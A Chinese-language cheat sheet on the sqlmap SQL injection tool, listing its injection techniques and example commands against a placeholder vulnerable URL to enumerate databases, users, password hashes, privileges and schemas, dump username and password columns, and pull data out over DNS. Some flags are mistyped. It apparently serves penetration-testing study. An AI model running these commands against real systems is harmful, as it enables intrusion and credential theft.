B: Boolean-based blind 基于布尔的忙逐步

E:Error-based 报错注入

U：Union query-based Union查询注入

S:Stacked queries 堆叠注入

T：Time-based blind 基于时间的盲注

Q：lnline queries 内联查询注入

例如：

sqlmap -u “存在注入点的URL" --technique B --current-db #利用基于布尔的盲注对注入点进行SQL注入探测。

例如： sqlmap -u "存在注入点的URL" --time-sec 3 --current-db

sqlmap -u “存在注入的URL" --union-cols 12-18 --current-db

sqlmap -u “存在注入的URL" --technique u --union-form users --current-db -v3

定义：通过设置DNS流量来突破限制 --dns-domain "dns服务器" 需要用户自身具有一个开放53端口的DNS服务器，通过DNS流量来获得web应用程序中数据内容。

sqlmap中可以设置二次注入的结果页面

sqlmap -u "存在注入的URL" --second-order

sqlmap -u "存在注入的URL" --fingerprint -f

探测目标指纹信息（--fingerprint -f)

获取后端数据库Banner信息 --banner 或者 -b

获取DBMS当前用户 --current-user

获取当前数据库名 --current-db

--hostname

--is-dba 探测当前用户是否是数据库管理员

--user 获取DBMS所有用户

--password 获取用户名密码

mysql -h IP地址 -u root -p #MySQL数据库登录

--privileges--role（角色）

例如：sqlmap -u "存在注入的URL" --technique -u -v3 --batch --privileges

--dbs 列举数据库名称

--tables 枚举表名 --> 制定具体数据库 -D 数据库名

--exclude-sysdbs

例如：(1)sqlmap -u "存在注入的URL" -D 数据库名 --tables

(2)sqlmap -u "存在注入的URL" --tables --exclude-sysdbs

--columns -D 指定数据库 -T 指定数据表 -C 指定具体字段

例如：sqlmap -u "存在注入的URL地址" -D 数据库名 -T 用户名 --columns

--dump

例如：sqlmap -u "存在注入的URL地址" -D 数据库名 -T 表名 -C “username，password" --dump

定义：用户可以使用此开关--schema检索DBMS模式。模式列表将所有的数据库、表和列，以及它们各自的类型。与--exclude-sysdb结合使用时，只会检索和显示包含非系统数据库的模式的一部分

例如：sqlmap -u "存在注入的URL地址" --schema--batch --exclude-sysdbs

如果用户只想知道表中的条目数，则可以使用此开关。

--count

例如：sqlmap -u "存在注入的URL地址" --count -D testdb